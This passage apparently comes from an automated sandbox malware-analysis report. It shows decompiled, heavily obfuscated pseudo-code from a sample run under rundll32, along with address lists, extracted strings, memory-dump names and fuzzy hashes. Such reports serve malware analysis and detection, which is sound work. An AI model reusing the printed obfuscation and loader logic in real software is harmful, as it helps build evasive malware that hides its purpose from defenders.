							goto L24;
						} else {
							__eflags = _t491 - 0x2f9aa500;
							if(_t491 == 0x2f9aa500) {
								_t473 = E001FDA66(_v1592, _t522, _v1688, _t491, _v1696);
								_t490 = _t473;
								_t547 =  &(_t547[3]);
								__eflags = _t473;
								if(__eflags != 0) {
									_t491 = 0x38e9bb98;
									goto L1;
								}
							} else {
								__eflags = _t491 - 0x38e9bb98;
								if(_t491 != 0x38e9bb98) {
									goto L24;
								} else {
									_t489 = E001FBE98(_v1704, _t522, _v1600, _v1756, _v1608, _v1712, _t490, _v1720, _v1616, _v1764, _t540, _v1724, _t491, _v1772, _t491, _t491, _v1624, _t491, _v1632, _v1692,  &_v520, _t540, _v1640, _v1648, _v1752, _v1568);
									_t546 = _t489;
									_t547 =  &(_t547[0x18]);
									__eflags = _t489;
									if(__eflags == 0) {
										goto L10;
									} else {
										_t491 = 0x2a58a6fb;
										_t543 = 1;
										_v1576 = 1;
										while(1) {
											L1:
											_t522 = 0x5c;
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t491 - 0x19ee210;
					} while (__eflags != 0);
					goto L27;
				}
			}

0x001ff813
0x001ff81d
0x001ff82a
0x001ff835
0x001ff83a
0x001ff845
0x001ff850
0x001ff858
0x001ff863
0x001ff86b
0x001ff873
0x001ff87b
0x001ff883
0x001ff888
0x001ff890
0x001ff898
0x001ff8a0
0x001ff8ab
0x001ff8b6
0x001ff8c1
0x001ff8cc
0x001ff8d7
0x001ff8e2
0x001ff8ed
0x001ff8f5
0x001ff900
0x001ff90b
0x001ff916
0x001ff921
0x001ff92f
0x001ff934
0x001ff93a
0x001ff93f
0x001ff941
0x001ff949
0x001ff951
0x001ff95e
0x001ff95f
0x001ff966
0x001ff96a
0x001ff972
0x001ff97d
0x001ff988
0x001ff993
0x001ff9a7
0x001ff9ae
0x001ff9b9
0x001ff9c4
0x001ff9cf
0x001ff9da
0x001ff9e2
0x001ff9ea
0x001ff9ef
0x001ff9f4
0x001ff9fc
0x001ffa04
0x001ffa0c
0x001ffa14
0x001ffa1c
0x001ffa27
0x001ffa32
0x001ffa3a
0x001ffa45
0x001ffa4d
0x001ffa57
0x001ffa5b
0x001ffa63
0x001ffa6b
0x001ffa76
0x001ffa83
0x001ffa8e
0x001ffa9c
0x001ffaa1
0x001ffaa7
0x001ffaaf
0x001ffab7
0x001ffabf
0x001ffacc
0x001ffacf
0x001ffad3
0x001ffadb
0x001ffae3
0x001ffaeb
0x001ffaf3
0x001ffafb
0x001ffb03
0x001ffb0b
0x001ffb13
0x001ffb1b
0x001ffb23
0x001ffb2b
0x001ffb30
0x001ffb35
0x001ffb3d
0x001ffb50
0x001ffb57
0x001ffb62
0x001ffb6a
0x001ffb7a
0x001ffb7e
0x001ffb86
0x001ffb8e
0x001ffba0
0x001ffba3
0x001ffbaa
0x001ffbb5
0x001ffbbd
0x001ffbc5
0x001ffbcd
0x001ffbda
0x001ffbde
0x001ffbe6
0x001ffbee
0x001ffbf6
0x001ffbfe
0x001ffc06
0x001ffc0e
0x001ffc16
0x001ffc1a
0x001ffc22
0x001ffc2a
0x001ffc35
0x001ffc3d
0x001ffc48
0x001ffc53
0x001ffc5e
0x001ffc69
0x001ffc74
0x001ffc7f
0x001ffc8a
0x001ffc92
0x001ffc9c
0x001ffca0
0x001ffca8
0x001ffcb2
0x001ffcbd
0x001ffcc8
0x001ffcd3
0x001ffce1
0x001ffce6
0x001ffcec
0x001ffcf1
0x001ffcf9
0x001ffd01
0x001ffd09
0x001ffd11
0x001ffd16
0x001ffd1b
0x001ffd23
0x001ffd2b
0x001ffd30
0x001ffd3d
0x001ffd40
0x001ffd44
0x001ffd4c
0x001ffd54
0x001ffd59
0x001ffd61
0x001ffd69
0x001ffd74
0x001ffd7f
0x001ffd8a
0x001ffd9a
0x001ffd9e
0x001ffda3
0x001ffdab
0x001ffdb3
0x001ffdb8
0x001ffdc0
0x001ffdc8
0x001ffdd3
0x001ffdde
0x001ffde9
0x001ffdf4
0x001ffdff
0x001ffe0a
0x001ffe15
0x001ffe24
0x001ffe29
0x001ffe32
0x001ffe3d
0x001ffe48
0x001ffe50
0x001ffe58
0x001ffe63
0x001ffe6b
0x001ffe74
0x001ffe79
0x001ffe7f
0x001ffe87
0x001ffe99
0x001ffe9c
0x001ffea3
0x001ffeae
0x001ffebb
0x001ffec2
0x001ffec9
0x001ffed0
0x001ffed4
0x001ffedc
0x001ffee4
0x001ffeef
0x001fff05
0x001fff0d
0x001fff12
0x001fff1a
0x001fff22
0x001fff2a
0x001fff35
0x001fff40
0x001fff4b
0x001fff4b
0x001fff4d
0x001fff4e
0x001fff4e
0x001fff4e
0x001fff4e
0x001fff54
0x00000000
0x00000000
0x001fff5a
0x00200093
0x002000c4
0x002000c9
0x002000cc
0x001fff4b
0x001fff4b
0x001fff4d
0x00000000
0x001fff4d
0x001fff60
0x001fff66
0x00200079
0x00200081
0x00200081
0x00200084
0x00000000
0x00000000
0x0020007e
0x0020007e
0x0020007e
0x00200086
0x00200089
0x00000000
0x001fff6c
0x001fff72
0x00200207
0x001fff78
0x001fff7e
0x00200061
0x00200066
0x00200069
0x00200069
0x001fff4b
0x001fff4b
0x001fff4d
0x00000000
0x001fff4d
0x001fff84
0x001fff84
0x001fff8a
0x00000000
0x001fff90
0x001fff90
0x001fff95
0x001fffa7
0x001fffb5
0x00200014
0x00200030
0x00200035
0x0020003c
0x0020003f
0x001fff4b
0x001fff4b
0x001fff4d
0x00000000
0x001fff4d
0x001fff4b
0x001fff8a
0x001fff7e
0x001fff72
0x001fff66
0x00200210
0x0020021b
0x0020021b
0x002000d6
0x002000dc
0x002001ce
0x002001d3
0x002001d6
0x002001dd
0x00000000
0x002000e2
0x002000e2
0x002000e8
0x002001a4
0x002001a9
0x002001ab
0x002001ae
0x002001b0
0x002001b2
0x00000000
0x002001b2
0x002000ee
0x002000ee
0x002000f4
0x00000000
0x002000fa
0x0020016e
0x00200173
0x00200175
0x00200178
0x0020017a
0x00000000
0x00200180
0x00200182
0x00200187
0x00200188
0x001fff4b
0x001fff4b
0x001fff4d
0x00000000
0x001fff4d
0x001fff4b
0x0020017a
0x002000f4
0x002000e8
0x00000000
0x002001de
0x002001de
0x002001de
0x00000000
0x002001ea

Strings

~', xrefs: 001FFD09
,, xrefs: 001FF8C1
Xdoo, xrefs: 001FFD44
*>, xrefs: 001FFE32
2(, xrefs: 001FFDC8
9\/!, xrefs: 001FF97D
B/, xrefs: 001FFB03
lf, xrefs: 001FFBEE
mR, xrefs: 001FFF35
Xdoo, xrefs: 001FFD38
-C, xrefs: 001FFD4C
c@, xrefs: 001FFA45
Jul, xrefs: 001FF858
Y, xrefs: 001FFBB5
w={Q, xrefs: 001FFAB7
u, xrefs: 001FFA04

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *>$,$-C$2($9\/!$B/$Jul$Xdoo$Xdoo$Y$c@$lf$mR$u$w={Q$~'
API String ID: 0-1002547484
Opcode ID: ff49091a84f07014ab0aa5ba75d1a26f82367d03a2432c43936fcc852ea94b17
Instruction ID: 61fdf2e03acdb15d799e78a6f5763a42a87619b9dde0b16d25c8e46dfcdf94de
Opcode Fuzzy Hash: ff49091a84f07014ab0aa5ba75d1a26f82367d03a2432c43936fcc852ea94b17
Instruction Fuzzy Hash: 1B32E2715083809FE378CF61C949B9BBBE1BBC5704F10891DE2DA962A0D7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 0029ED87, Relevance: 20.4, Strings: 16, Instructions: 429COMMON

Download Yara Rule

Strings

9\/!, xrefs: 0029EEF1
,, xrefs: 0029EE35
~', xrefs: 0029F27D
-C, xrefs: 0029F2C0
mR, xrefs: 0029F4A9
Xdoo, xrefs: 0029F2AC
c@, xrefs: 0029EFB9
Y, xrefs: 0029F129
Jul, xrefs: 0029EDCC
lf, xrefs: 0029F162
B/, xrefs: 0029F077
2(, xrefs: 0029F33C
Xdoo, xrefs: 0029F2B8
u, xrefs: 0029EF78
w={Q, xrefs: 0029F02B
*>, xrefs: 0029F3A6

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *>$,$-C$2($9\/!$B/$Jul$Xdoo$Xdoo$Y$c@$lf$mR$u$w={Q$~'
API String ID: 0-1002547484
Opcode ID: ba784f207c1a3abe7487424ca6f9ac5ae800032dc8416fd11b96d9c302bc17bc
Instruction ID: 03d302497ca5abbf2184238d3e314efda614764728f9ede11041d2d65848e8eb
Opcode Fuzzy Hash: ba784f207c1a3abe7487424ca6f9ac5ae800032dc8416fd11b96d9c302bc17bc
Instruction Fuzzy Hash: 833202715083809FE7B8CF61C949B9BBBE1BBC4308F10891DE2DA96260D7B58959CF13

Uniqueness

Uniqueness Score: -1.00%

Function 00201259, Relevance: 19.2, Strings: 15, Instructions: 407
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00201259(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _t456;
				signed int _t460;
				intOrPtr _t483;
				intOrPtr* _t486;
				void* _t490;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				intOrPtr _t542;
				void* _t543;
				intOrPtr* _t550;
				signed int* _t551;
				signed int* _t552;

				_t486 = __ecx;
				_t551 =  &_v328;
				_v144 = __edx;
				_v148 = __ecx;
				_v140 = 0x789b9f;
				_v136 = 0;
				_v132 = 0;
				_v252 = 0x9c45;
				_v252 = _v252 >> 0xa;
				_v252 = _v252 + 0xdca;
				_v252 = _v252 ^ 0x000071fb;
				_v324 = 0x63fc;
				_v324 = _v324 | 0x88cdde90;
				_v324 = _v324 + 0x73bf;
				_v324 = _v324 + 0xfe3;
				_v324 = _v324 ^ 0x88cef902;
				_v292 = 0x54b2;
				_v292 = _v292 >> 0x10;
				_v292 = _v292 | 0xe7a4c23a;
				_v292 = _v292 ^ 0x9f79697b;
				_v292 = _v292 ^ 0x78ddcaec;
				_v192 = 0xd97d;
				_v192 = _v192 * 0x68;
				_t543 = 0x2ff3c5f1;
				_v192 = _v192 ^ 0x005860dd;
				_v276 = 0xcf22;
				_t533 = 0x30;
				_v276 = _v276 * 0x64;
				_v276 = _v276 * 0x23;
				_v276 = _v276 / _t533;
				_v276 = _v276 ^ 0x003aac15;
				_v200 = 0xe99;
				_v200 = _v200 * 0x77;
				_v200 = _v200 ^ 0x0006edd2;
				_v316 = 0x8b49;
				_v316 = _v316 << 5;
				_v316 = _v316 | 0x25c31d21;
				_v316 = _v316 * 0x76;
				_v316 = _v316 ^ 0x6f7b91fa;
				_v300 = 0x416c;
				_v300 = _v300 ^ 0x0db1fc9b;
				_v300 = _v300 | 0xf73ffbe5;
				_v300 = _v300 ^ 0xffbfa19e;
				_v232 = 0x7c56;
				_v232 = _v232 << 7;
				_v232 = _v232 | 0x65dc48c8;
				_v232 = _v232 ^ 0x65fe4a93;
				_v284 = 0xa4ad;
				_v284 = _v284 + 0x3b34;
				_v284 = _v284 | 0x46e5bf9e;
				_v284 = _v284 + 0xaed;
				_v284 = _v284 ^ 0x46e62dba;
				_v308 = 0x51a5;
				_v308 = _v308 + 0xffff7093;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0x4d44;
				_v308 = _v308 ^ 0xffe14d92;
				_v216 = 0x9cb5;
				_v216 = _v216 + 0xa1ba;
				_v216 = _v216 ^ 0x7c221f2f;
				_v216 = _v216 ^ 0x7c23012a;
				_v248 = 0xb7b7;
				_v248 = _v248 + 0xffff0c03;
				_v248 = _v248 ^ 0x49401faf;
				_v248 = _v248 ^ 0xb6bfcfdf;
				_v268 = 0xf946;
				_t534 = 0x23;
				_v268 = _v268 / _t534;
				_v268 = _v268 ^ 0x2bbfee68;
				_v268 = _v268 << 0xa;
				_v268 = _v268 ^ 0xffa5a976;
				_v240 = 0x34aa;
				_v240 = _v240 ^ 0x898fa139;
				_t535 = 0x66;
				_v240 = _v240 * 0xf;
				_v240 = _v240 ^ 0x0f69dc7c;
				_v328 = 0xae94;
				_v328 = _v328 >> 0xd;
				_v328 = _v328 ^ 0x36fbf0c7;
				_v328 = _v328 | 0xa53cbb78;
				_v328 = _v328 ^ 0xb7ffdef1;
				_v208 = 0xbc8e;
				_v208 = _v208 + 0x75c8;
				_v208 = _v208 ^ 0x00011f72;
				_v160 = 0x504a;
				_v160 = _v160 ^ 0xbc1e1624;
				_v160 = _v160 ^ 0xbc1e3fa8;
				_v312 = 0xe1b9;
				_v312 = _v312 ^ 0x616bd030;
				_v312 = _v312 * 0x17;
				_v312 = _v312 << 3;
				_v312 = _v312 ^ 0x050b8b93;
				_v172 = 0x434;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x00007db4;
				_v320 = 0x7186;
				_v320 = _v320 / _t535;
				_v320 = _v320 ^ 0x70a7bdd0;
				_v320 = _v320 + 0xffffa3e3;
				_v320 = _v320 ^ 0x70a70491;
				_v224 = 0x741a;
				_v224 = _v224 << 0xd;
				_v224 = _v224 + 0xffff57ca;
				_v224 = _v224 ^ 0x0e82cf00;
				_v288 = 0xd06d;
				_v288 = _v288 | 0x7ffffd7f;
				_v288 = _v288 ^ 0x7fffa657;
				_v296 = 0x1ceb;
				_v296 = _v296 + 0x45c4;
				_v296 = _v296 << 0xc;
				_t536 = 0x1f;
				_v296 = _v296 * 0x49;
				_v296 = _v296 ^ 0xc23e624a;
				_v164 = 0xac99;
				_v164 = _v164 + 0xffff7636;
				_v164 = _v164 ^ 0x000007a2;
				_v304 = 0xffa9;
				_v304 = _v304 << 0x10;
				_v304 = _v304 / _t536;
				_t537 = 0x2f;
				_v304 = _v304 / _t537;
				_v304 = _v304 ^ 0x002cccb4;
				_v184 = 0x3467;
				_v184 = _v184 ^ 0xc277e171;
				_v184 = _v184 ^ 0xc277d8b3;
				_v176 = 0xda70;
				_v176 = _v176 + 0xffff1f30;
				_v176 = _v176 ^ 0xffffb27f;
				_v260 = 0xae02;
				_v260 = _v260 << 0xc;
				_v260 = _v260 * 0x50;
				_v260 = _v260 ^ 0x660a4938;
				_v256 = 0x63fd;
				_v256 = _v256 + 0x38f;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000034b4;
				_v280 = 0x1bf8;
				_v280 = _v280 | 0x50a879c7;
				_v280 = _v280 ^ 0xa62f7448;
				_v280 = _v280 << 5;
				_v280 = _v280 ^ 0xd0e1eb8a;
				_v244 = 0x35;
				_t538 = 0x63;
				_v244 = _v244 * 0x70;
				_v244 = _v244 << 4;
				_v244 = _v244 ^ 0x000178e8;
				_v156 = 0x4bd8;
				_v156 = _v156 >> 0xa;
				_v156 = _v156 ^ 0x00000c69;
				_v272 = 0xcefd;
				_v272 = _v272 << 4;
				_v272 = _v272 * 0x45;
				_v272 = _v272 + 0xffffd708;
				_v272 = _v272 ^ 0x037c36fb;
				_v196 = 0x7f21;
				_v196 = _v196 * 0x5e;
				_v196 = _v196 ^ 0x002ea2e9;
				_v204 = 0xcb9f;
				_v204 = _v204 / _t538;
				_v204 = _v204 ^ 0x00000b3c;
				_v168 = 0x3be2;
				_v168 = _v168 + 0xffffc6dc;
				_v168 = _v168 ^ 0x000064f9;
				_v264 = 0xf83;
				_v264 = _v264 >> 0xa;
				_v264 = _v264 + 0xacf6;
				_t539 = 0x33;
				_v264 = _v264 / _t539;
				_v264 = _v264 ^ 0x00007950;
				_v236 = 0xe76d;
				_t540 = 0x54;
				_v236 = _v236 / _t540;
				_t541 = 0x1b;
				_v236 = _v236 * 0x11;
				_v236 = _v236 ^ 0x00002164;
				_v188 = 0xc970;
				_v188 = _v188 / _t541;
				_v188 = _v188 ^ 0x00007c4d;
				_v212 = 0xdba3;
				_v212 = _v212 ^ 0x3f6919ac;
				_v212 = _v212 ^ 0x3cbdc81e;
				_v212 = _v212 ^ 0x03d448c8;
				_v220 = 0x9876;
				_v220 = _v220 >> 5;
				_v220 = _v220 * 0x3f;
				_v220 = _v220 ^ 0x00015d8d;
				_v180 = 0xda76;
				_v180 = _v180 + 0xffffee50;
				_v180 = _v180 ^ 0x0000c932;
				_v228 = 0x4db6;
				_v228 = _v228 >> 0xf;
				_v228 = _v228 >> 0xc;
				_v228 = _v228 ^ 0x00001ce0;
				_t550 = _a4;
				_t542 = _v144;
				_t483 = _v144;
				while(_t543 != 0xe3f9543) {
					if(_t543 == 0x265bf3eb) {
						_t456 = E00205A17(_v276,  &_v152, _v200, _v316);
						_pop(_t490);
						_push(_v308);
						_t384 = (_t456 & 0x0000000f) + 4; // 0x4
						E00204047(_t384, _v300, _v232, _t490, _v284,  &_v152,  &_v128);
						 *((char*)(_t551 + (_t456 & 0x0000000f) + 0xf8)) = 0;
						_t460 = E00205A17(_v216,  &_v152, _v248, _v268);
						_t552 =  &(_t551[8]);
						_t547 = _t460 & 0x0000000f;
						_push(_v160);
						_t397 = _t547 + 4; // 0x4
						E00204047(_t397, _v240, _v328, _v216, _v208,  &_v152,  &_v64);
						_push(_v320);
						 *((char*)(_t552 + (_t460 & 0x0000000f) + 0x138)) = 0;
						_push(_v172);
						_t542 = _t542 + E0020E14D(_v224, __eflags, _v288, _v296,  &_v64, E00202164(0x1f1534, _v312, __eflags), _v164, _v304, _v144,  &_v128, _v184, _t542);
						E0020C5F7(_v176, _v260, _v256, _v280, _t464);
						_t551 =  &(_t552[0x15]);
						_t543 = 0xe3f9543;
						L10:
						_t486 = _v148;
						continue;
					}
					if(_t543 == 0x2b2ac207) {
						_push(_t486);
						_t542 = E002057E8(_a4);
						 *_t550 = _t542;
						__eflags = _t542;
						if(__eflags == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t543 = 0x265bf3eb;
						_t483 = _a4 + _t542;
						goto L10;
					}
					if(_t543 == 0x2ff3c5f1) {
						_v152 = E00207B6B();
						_t543 = 0x30aa390f;
						goto L10;
					}
					if(_t543 == 0x30aa390f) {
						_t543 = 0x2b2ac207;
						_a4 =  *((intOrPtr*)(_t486 + 4)) + 0x1000;
						continue;
					}
					_t561 = _t543 - 0x3a71eb6b;
					if(_t543 != 0x3a71eb6b) {
						L15:
						__eflags = _t543 - 0x15497eaf;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(_v168);
					_push(_v204);
					E001FD901(_v236, _t561, E00202164(0x1f1474, _v196, _t561), _t542, _t483 - _t542, _v144, _v188);
					E0020C5F7(_v212, _v220, _v180, _v228, _t478);
					return 1;
				}
				E001F9970(_v244,  *_t486, _v156, _t542,  *((intOrPtr*)(_t486 + 4)), _v272);
				_t486 = _v148;
				_t551 =  &(_t551[4]);
				_t543 = 0x3a71eb6b;
				_t542 = _t542 +  *((intOrPtr*)(_t486 + 4));
				__eflags = _t542;
				goto L15;
			}

0x00201259
0x00201259
0x00201263
0x0020126a
0x00201271
0x0020127e
0x00201285
0x0020128c
0x00201294
0x00201299
0x002012a1
0x002012a9
0x002012b1
0x002012b9
0x002012c1
0x002012c9
0x002012d1
0x002012d9
0x002012de
0x002012e6
0x002012ee
0x002012f6
0x00201309
0x00201310
0x00201315
0x00201320
0x00201331
0x00201332
0x0020133d
0x00201347
0x0020134b
0x00201353
0x00201366
0x0020136d
0x00201378
0x00201380
0x00201385
0x00201392
0x00201396
0x0020139e
0x002013a6
0x002013ae
0x002013b6
0x002013be
0x002013c6
0x002013cb
0x002013d3
0x002013db
0x002013e3
0x002013eb
0x002013f3
0x002013fb
0x00201403
0x0020140b
0x00201413
0x00201418
0x00201420
0x00201428
0x00201433
0x0020143e
0x00201449
0x00201454
0x0020145c
0x00201464
0x0020146c
0x00201476
0x00201482
0x00201487
0x0020148d
0x00201495
0x0020149a
0x002014a2
0x002014aa
0x002014b7
0x002014ba
0x002014be
0x002014c6
0x002014ce
0x002014d3
0x002014db
0x002014e3
0x002014eb
0x002014f6
0x00201501
0x0020150c
0x00201517
0x00201522
0x0020152d
0x00201535
0x00201542
0x00201546
0x0020154b
0x00201553
0x0020155e
0x00201566
0x00201571
0x00201581
0x00201585
0x0020158d
0x00201595
0x0020159d
0x002015a5
0x002015aa
0x002015b2
0x002015ba
0x002015c2
0x002015ca
0x002015d2
0x002015da
0x002015e2
0x002015ec
0x002015ef
0x002015f3
0x002015fb
0x00201606
0x00201611
0x0020161c
0x00201624
0x00201631
0x00201639
0x0020163c
0x00201640
0x00201648
0x00201653
0x0020165e
0x00201669
0x00201674
0x0020167f
0x0020168a
0x00201692
0x0020169c
0x002016a2
0x002016aa
0x002016b2
0x002016ba
0x002016bf
0x002016c7
0x002016cf
0x002016d7
0x002016df
0x002016e4
0x002016ec
0x002016fb
0x002016fe
0x00201702
0x00201707
0x0020170f
0x0020171a
0x00201722
0x0020172d
0x00201735
0x0020173f
0x00201743
0x0020174b
0x00201753
0x00201766
0x0020176d
0x00201778
0x0020178e
0x00201795
0x002017a0
0x002017ab
0x002017b6
0x002017c1
0x002017c9
0x002017ce
0x002017da
0x002017df
0x002017e5
0x002017ed
0x002017f9
0x002017fe
0x00201809
0x0020180a
0x0020180e
0x00201816
0x0020182a
0x00201831
0x0020183c
0x00201847
0x00201852
0x0020185d
0x00201868
0x00201870
0x0020187a
0x0020187e
0x00201886
0x00201891
0x0020189c
0x002018a7
0x002018af
0x002018b4
0x002018b9
0x002018c1
0x002018c8
0x002018cf
0x002018d6
0x002018e8
0x00201a06
0x00201a0c
0x00201a0d
0x00201a36
0x00201a39
0x00201a49
0x00201a5c
0x00201a61
0x00201a6d
0x00201a70
0x00201a93
0x00201a96
0x00201a9b
0x00201aa4
0x00201aac
0x00201b04
0x00201b1a
0x00201b1f
0x00201b22
0x002019b6
0x002019b6
0x00000000
0x002019b6
0x002018f4
0x002019cd
0x002019d6
0x002019d8
0x002019dc
0x002019de
0x00201b64
0x00201b64
0x00000000
0x00201b64
0x002019e7
0x002019ec
0x00000000
0x002019ec
0x00201900
0x002019aa
0x002019b1
0x00000000
0x002019b1
0x0020190c
0x0020198b
0x00201995
0x00000000
0x00201995
0x0020190e
0x00201914
0x00201b58
0x00201b58
0x00201b5e
0x00000000
0x00000000
0x00000000
0x00201b5e
0x0020191a
0x00201926
0x00201956
0x00201978
0x00000000
0x00201982
0x00201b41
0x00201b46
0x00201b4d
0x00201b50
0x00201b55
0x00201b55
0x00000000

Strings

g4, xrefs: 00201648
m, xrefs: 002017ED
kq:, xrefs: 00201B50
5, xrefs: 002016EC
8If, xrefs: 002016A2
V|, xrefs: 002013BE
;, xrefs: 002017A0
4;, xrefs: 002013E3
M|, xrefs: 00201831
DM, xrefs: 00201418
kq:, xrefs: 0020190E
d!, xrefs: 0020180E
Py, xrefs: 002017E5
lA, xrefs: 0020139E
JP, xrefs: 0020150C

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4;$5$8If$DM$JP$M|$Py$V|$d!$g4$kq:$kq:$lA$m$;
API String ID: 0-568511501
Opcode ID: 7061026b15429158ddef9fde2deadd22a7b8531bab49a848570d8b1701cc4573
Instruction ID: 201bfc9228dc893c8a72707e9c7dc9eee44dea36b1ce835e9dc80ed9c573ae16
Opcode Fuzzy Hash: 7061026b15429158ddef9fde2deadd22a7b8531bab49a848570d8b1701cc4573
Instruction Fuzzy Hash: B62201715093819FE364CF25C98AA8BFBF1FBC5708F10891DE299962A1D7B58909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002A72F1, Relevance: 17.9, Strings: 14, Instructions: 374COMMON

Download Yara Rule

Strings

cY, xrefs: 002A7782
2V, xrefs: 002A75DE
X, xrefs: 002A7706
#1, xrefs: 002A7371
x<N, xrefs: 002A78BC
\C, xrefs: 002A76BB
9I, xrefs: 002A73EF
%D, xrefs: 002A7508
s-, xrefs: 002A7887
@;, xrefs: 002A7336
=[, xrefs: 002A7319
x<N, xrefs: 002A79F1
bC, xrefs: 002A782B
BS, xrefs: 002A77E5

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #1$%D$2V$9I$=[$@;$\C$bC$cY$s-$x<N$x<N$BS$X
API String ID: 0-3306313712
Opcode ID: ed886303e9e6ed92dc292b4c605a13ef5dd6969c601dad6251ed63372b625f77
Instruction ID: 039462e301480ef3dc1b2e19d50dab12bd4b8b7d23e817fa339f623c2fe90112
Opcode Fuzzy Hash: ed886303e9e6ed92dc292b4c605a13ef5dd6969c601dad6251ed63372b625f77
Instruction Fuzzy Hash: 8512347150D3819FE368CF25C98AA4BBBF1BBC5708F108A1DE1D9862A0D7B58959CF07

Uniqueness

Uniqueness Score: -1.00%

Function 001F2628, Relevance: 16.6, Strings: 13, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001F2628(signed int __ecx, intOrPtr* __edx) {
				short* _t400;
				signed int _t408;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				short _t457;
				void* _t460;
				intOrPtr* _t464;
				void* _t466;

				 *(_t466 + 0xa4) = 0x1cb5a8;
				 *(_t466 + 0xa8) = 0x505ffa;
				_t457 = 0;
				 *(_t466 + 0xb0) = __ecx;
				 *((intOrPtr*)(_t466 + 0xbc)) = 0;
				_t464 = __edx;
				 *(_t466 + 0x30) = 0x376c;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) << 3;
				_t460 = 0xe980b9f;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0xffff79a1;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0x5a99;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) ^ 0x00018f98;
				 *(_t466 + 0x7c) = 0xd2fb;
				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) + 0xc9d;
				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) ^ 0x0000df88;
				 *(_t466 + 0x50) = 0x1f52;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) | 0x4d6b1b5a;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) >> 7;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) ^ 0x409ad63e;
				 *(_t466 + 0x64) = 0xb688;
				_t412 = 0x15;
				 *(_t466 + 0x68) =  *(_t466 + 0x64) / _t412;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7853c5;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7823fa;
				 *(_t466 + 0x14) = 0x1176;
				_t413 = 0x74;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) * 0x26;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffff909d;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffdc13;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0x000201fd;
				 *(_t466 + 0x94) = 0xba7a;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) << 0xa;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x02e990c5;
				 *(_t466 + 0x24) = 0xa3c4;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x9ff723c2;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) / _t413;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) + 0x3928;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x01616723;
				 *(_t466 + 0x1c) = 0x7213;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) | 0x351e9b59;
				_t414 = 0x5f;
				 *(_t466 + 0x18) =  *(_t466 + 0x1c) * 0x1d;
				 *(_t466 + 0x18) =  *(_t466 + 0x18) >> 3;
				 *(_t466 + 0x18) =  *(_t466 + 0x18) ^ 0x00904fb7;
				 *(_t466 + 0x5c) = 0x297a;
